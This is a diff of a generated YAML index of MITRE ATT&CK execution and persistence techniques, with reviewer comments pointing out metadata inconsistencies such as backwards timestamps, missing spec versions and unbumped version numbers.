+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
@@ -29556,7 +29935,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
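Review bot: the `modified` timestamp for T1204.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-08-26T16:42:35.318Z`, while every other technique in this patch moves forward to a 2024 date. A regenerated object should never carry an older modification time than the one it replaces; this looks like the object was produced from a stale STIX bundle and should be re-run against the same source as the rest.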
@@ -29583,30 +29962,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
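Review bot: T1204.003 is the only technique in this patch that loses `x_mitre_attack_spec_version: 2.1.0` (the removed line above `identifier: T1204.003`) without a replacement `3.2.0` line anywhere in its hunks, so after the patch it has neither `spec_version` nor `x_mitre_attack_spec_version`. It also keeps `x_mitre_permissions_required`, which the patch strips from T1559 and T1569. Both point to this object not having been regenerated with the others; either regenerate it or add the `3.2.0` line by hand.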
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
@@ -29623,9 +29984,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -29633,21 +29995,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
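Review bot: T1203 gains two data sources (`File: File Modification`, `Network Traffic: Network Traffic Flow`) and a new `modified` date, but `x_mitre_version` is re-emitted unchanged at `'1.4'`, whereas the other techniques in this patch whose content changed got a bump (T1204 1.6 to 1.7, T1559 1.2 to 1.3, T1569 1.2 to 1.3). Confirm the upstream object really still carries 1.4; if the data-source change was made locally, bump the version so consumers can tell the object changed.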
@@ -29697,28 +30075,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -29729,32 +30090,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
@@ -29797,12 +30170,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -29859,11 +30231,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -29928,14 +30299,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -29956,14 +30326,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
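Review bot: key ordering is inconsistent within the patch: for T1648, `x_mitre_attack_spec_version: 3.2.0` is inserted directly after `kill_chain_phases` and `x_mitre_modified_by_ref` after `x_mitre_is_subtechnique` (both moved up from the end of the object in the later hunk), while every other regenerated technique here keeps both keys after `object_marking_refs`. Have the generator emit one fixed key order so diffs show only real content changes; as it stands the actual edits in this object (platform `Office 365` to `Office Suite`, version 1.0 to 1.1, contributor `OWN`) are buried in reordering noise.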
@@ -29972,16 +30347,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
@@ -30007,6 +30384,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
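Review bot: in the new `OWN-CERT Google App Script 2024` reference the `source_name` carries a year while the `description` says `(n.d.)`; one of the two is wrong, and the publication date, if known, belongs in the description. Both new entries are upstream ATT&CK reference data, so the right fix is a report upstream rather than a hand edit of this generated file.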
@@ -30021,29 +30406,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
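Review bot: `- spec_version: '2.1'` is dropped here and from every other object in this patch. STIX 2.1 requires `spec_version` on each object, so anything that loads the `technique:` blocks as STIX objects or validates them against the STIX 2.1 schema will now fail or fall back to 2.0 semantics; confirm the new source bundle really omits it and that no consumer of this index depends on it. The rest of this hunk (T1204.001 platforms, domains, ids and references deleted here and re-added in `@@ -30056`) is a pure key move with no content change.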
@@ -30056,25 +30422,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
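Review bot: `- x_mitre_permissions_required:` / `- - User` disappears from T1204.001 while `x_mitre_remote_support: false`, `revoked: false` and `x_mitre_deprecated: false` are added; the same field is also removed from T1556.003 (`@@ -30575`) yet kept as unchanged context for T1053.003 at the end of the patch (`x_mitre_permissions_required:` / `- User`). Confirm this mixed state matches the upstream release rather than a serializer dropping the key on some objects, since tooling that filters techniques by required privilege will treat the missing field as unknown.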
@@ -30124,17 +30506,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -30197,7 +30578,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -30231,8 +30612,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -30241,6 +30622,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
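Review bot: the new Cybereason URL ends in `#blog-subscribe`, so it deep-links to the newsletter widget rather than the article; the fragment is harmless for fetching but misleading in a citation. It is upstream ATT&CK reference data, so report it upstream or strip fragments in the generator rather than hand-editing this generated file.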
@@ -30253,29 +30638,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
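Review bot: check the rendered description after this hunk. The sentence about the deprecated `at` utility is removed via `- though at.exe` and `- or the Control Panel.\n\nAn adversary ...`, but the line between them, `can not access tasks created with schtasks`, is shown as unchanged context, which would leave that fragment stranded between `...section of the Control` and `Panel.(Citation: Stack Overflow)` in the new text. Most likely the diff view split a single removed line around inline markup, but the merged YAML string should be eyeballed to confirm it reads correctly.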
@@ -30322,7 +30707,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
